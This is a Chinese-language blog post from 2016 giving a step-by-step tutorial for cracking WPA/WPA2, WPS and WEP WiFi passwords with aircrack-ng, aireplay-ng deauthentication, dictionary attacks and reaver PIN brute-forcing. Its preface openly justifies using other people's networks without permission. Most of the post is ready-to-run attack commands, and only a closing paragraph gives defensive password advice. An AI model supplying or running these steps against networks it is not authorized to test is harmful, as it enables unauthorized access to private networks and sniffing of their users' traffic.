wifi 破解

Posted by JenI on 2016-11-02 00:00:00+08:00

前言

由于近几年智能移动设备的普及和发展,大家对无线网的需求变得越来越大,尽管手机等设备可以通过数据流量上网,但是毕竟流量费还没低到我们可以放肆玩耍的地步,wifi仍然是大多数“网瘾少年”的首选。所以,掌握wifi破解技术还是很有必要的,尽管蹭网并不是什么光彩的事,而且伴有安全隐患,不过有些网络资源一直被闲置,我们借用一下也算是对社会资源的充分利用嘛......好吧,我承认这都是借口,但是没关系,只要我们不干坏事,偶尔蹭个网用也不为过。

先来介绍一下wifi的几种加密方式

加密方式

  • WEP加密方式现在基本上已经看不到了,主要原因是由于它的加密体制存在缺陷,通过收集足够的数据包,可以直接还原出密码,所以使用这种加密方式并不安全。

  • WPA/WPA2是现在被广泛使用的加密方式,也就是我们日常生活中最常见的加密方式。采用这种加密方式时,只要密码的复杂度足够高,是很难被破解的。目前这种加密方式唯一的破解方式是枚举,除非它开启了 WPS。

环境

不管你是 Windows 还是 Linux,首先要保证你的系统或虚拟机系统可以识别你的无线网卡,如果是物理机系统的话可以直接使用笔记本内置的无线网卡,如果是虚拟机的话需要单独买一个支持监听功能的无线网卡,十几到几十元不等,然后在系统内安装针对该网卡芯片的驱动。

破解需要用到 Aircrack-ng 软件,它是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之前名字是Aircrack,在其2.41版本之后才改名为Aircrack-ng。对于无线安全人员而言,Aircrack-ng也是一款必备的无线安全检测工具,它可以帮助管理员进行无线网络密码的脆弱性检查及了解无线网络信号的分布情况,非常适合对企业进行无线安全审计时使用。

根据自己的系统自行安装 Aircrack-ng 工具,该工具为一个套件。套件内包含 aircrack-ng、airdecap-ng、airmon-ng、aireplay-ng、airodump-ng、airtun-ng 、airolib-ng、packetforge-ng、Tools、airbase-ng、airdecloak-ng、airdriver-ng、airolib-ng、airserv-ng、buddy-ng、easside-ng、tkiptun-ng、wesside-ng

下列操作在 Linux 上实现,window操作类似。

WPA/WPA2破解方法

首先我在另一台电脑上使用无线网卡模拟了一个 AP 环境,把它作为本次实验的目标,也就是我们需要破解的无线网。下图为该网络的信息

tp-link

执行破解步骤

1.载入无线网卡
首先查看无线网卡是否激活

ifconfig

如果没有看到自己的无线网卡,执行
ifconfig -a

驱动正常的情况下应该会显示出自己的网卡名,比如 wlan0 这种,我这里是 wlp4s0,使用如下命令激活无线网卡
sudo ifconfig wlp4s0 up
aircrack-1

2.开启监听模式,监听模式下适配器名称会变更,比如我的变成了 wlp4s0mon

sudo airmon-ng start wlp4s0

aircrack-2

aircrack-3

3.获取当前无线网概况,包括AP的SSID、MAC地址、工作频道、无线客户端MAC及数量等

sudo airodump-ng wlp4s0mon

aircrack-4

记录下自己想要破解的wifi所在的频道,也就是 CH 那列的数字,然后可以 Ctrl+c 结束扫描,我们的目标是 SoftAP ,所以我们记下 1 这个信道

4.选取要破解的无线网络,开始抓包

sudo airodump-ng -c 1 –w log wlp4s0mon
# -c 为目标AP的工作频道,我们要进行攻击测试的无线路由器工作频道为1;
# -w 后跟要保存的文件名,名字随意。要注意的是:这里虽然设置的文件名是log,但是生成的文件却不是log.cap,而是log-01.cap,在进行第二次攻击时,若使用同样文件名log保存的话,就会生成名为log-02.cap的文件。

aircrack-5

5.打开一个新的终端,发送名叫“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端会自动重新连接无线路由器,我们也可以捕获到包含 WPA-PSK 4次握手验证的数据包了。

sudo aireplay-ng -0 1 –a 14:CF:92:DB:46:B3 -c CC:3A:61:C9:15:77 wlp4s0mon
# -0 用aireplay的“0”模式(攻击模式,模拟目标客户端向AP发送重连请求,从而会使目标客户端断开连接),借以捕获握手包。后面的数字可以改为1-10不等,数字越大,攻击次数越多。
# -a 目标无线网的MAC地址;
# -c 客户端的MAC地址;

aircrack-6

回到 airodump-ng 界面,右上角会出现 “WPA handshake” 的提示,这表示获得到了包含WPA-PSK密码的4此握手数据报文

6.成功获取到无线WPA-PSK验证数据报文后,就可以开始破解
此时终端所在工作路径目录内会有以下文件

aircrack-7

执行

sudo aircrack-ng -w blackhat/wordlist1.dic log-01.cap
# -w 后跟预先制作的字典

aircrack-8

最后记得结束网卡的监听模式

sudo airmon-ng stop wlp4s0mon

如果如上图显示,则说明找到了密码,如果没有找到密码的话,可以更换字典,再次尝试对cap文件进行密文比对,直到破解成功。所以说 WPA/WPA2 加密方式破解wifi是有一定几率的,成功与否取决于字典是否强大。

但是,如果采用 WPA/WPA2 加密方式的无线网开启了 WPS ,那就可以直接跑 PIN 码破解wifi

WPS(Wi-Fi Protected Setup,WiFi保护设置)是由Wi-Fi联盟所推出的 Wi-Fi 安全防护设定搜索标准,与之对应的还有一个名词叫 QSS ,QSS又称快速安全设置,顾名思义,它是一种与无线网络进行快速连接的方式。对于一般用户,WPS提供了一个简单的方法与无线路由器进行快速互联,它会随机产生一个八位数字的字符串作为个人识别号码(PIN)进行加密操作。省去了客户端需要连入无线网络时,必须手动添加网络名称(SSID)及输入冗长的无线加密密码的繁琐过程。但方便的同时伴随而来的就是不安全,根据加密特点,pin码最多为10的8次方,这样一个有极限的数字是肯定可以被爆破出来的,只是要以巨大的时间为代价而已。不过不要紧,它的另外两个特性会大大缩短我们破解的时间。第一个特性是这个8位的 PIN 码的最后一位是一个校验和,也就是说,我们只需要破解前7位就可以了。第二个特性是无线路由器会认证这个 PIN 码的前后两部分,前4位与后3位,如果不正确,它返回一个EAP-NACK信息,根据这个信息我们可以判断出这两部分是否正确,这样我们需要枚举的数字就变成了4的10次方加上3的10次方,也就是11000个。换句话说,由于他的这些特性,我们基本可以在一两个小时以内破解出 PIN 码,破解出来后,再使用相关工具连接即可

知道了原理,再来说说方法

前面的步骤和使用字典破解是一样的,在开启监听模式后,执行

sudo wash -i wlp4s0mon -C

如果什么也没有就说明附近没有开启 WPS 的无线路由器,如果有的话,记住该无线网的 BSSID,然后执行(reaver工具需要单独安装)

reaver -i wlp4s0mon -b 目标网卡的mac地址 -vv -a

之后静静的等待就好了。

WEP破解方法(不是重点,简单介绍)

1.载入无线网卡
首先查看无线网卡是否激活

ifconfig

如果没有看到自己的无线网卡,执行
ifconfig -a

驱动正常的情况下应该会显示出自己的网卡名,比如 wlan0 这种,我这里是 wlp4s0,使用如下命令激活无线网卡
sudo ifconfig wlp4s0 up

2.开启监听模式,监听模式下适配器名称会变更,比如我的变成了 wlp4s0mon

sudo airmon-ng start wlp4s0

3.获取当前无线网概况,包括AP的SSID、MAC地址、工作频道、无线客户端MAC及数量等

sudo airodump-ng wlp4s0mon

记录下自己想要破解的wifi所在的频道,也就是 CH 那列的数字,然后可以 Ctrl+c 结束扫描

4.选取了目标之后,输入

sudo airodump-ng --ivs -w log -c 频道号 wlp4s0mon

5.开启一个新的终端,输入

aireplay-ng -3 -b 目标wifi的mac地址 -h 客户端的mac地址 wlp4s0mon

6.IVs 值达到2万以上时,再打开一个终端,使用 aircrack-ng 开始破解 WEP

sudo aircrack-ng 捕获的 IVs 文件

如果不出意外,密码就被破解出来了。但是之前也说过,这种加密方式基本上没有了, 了解一下就可以了

思考

通过上面的实验可以看出现在的无线网络并没有想象中那么安全,如果有人破解出了你无线网的密码,他就可进一步控制你的路由器,甚至对你经由路由器发送的数据进行嗅探,从而获取你的信息。所以如果想让自己拥有一个尽量安全的网络环境,那就把你的wifi密码设置的复杂一点吧。而且,尽量不要在公共场所提供的免费wifi进行购物、付款等设计个人财产的操作,因为很有可能你的信息就被别人抓到了。


作者:   JenI   转载请注明出处,谢谢


Comments !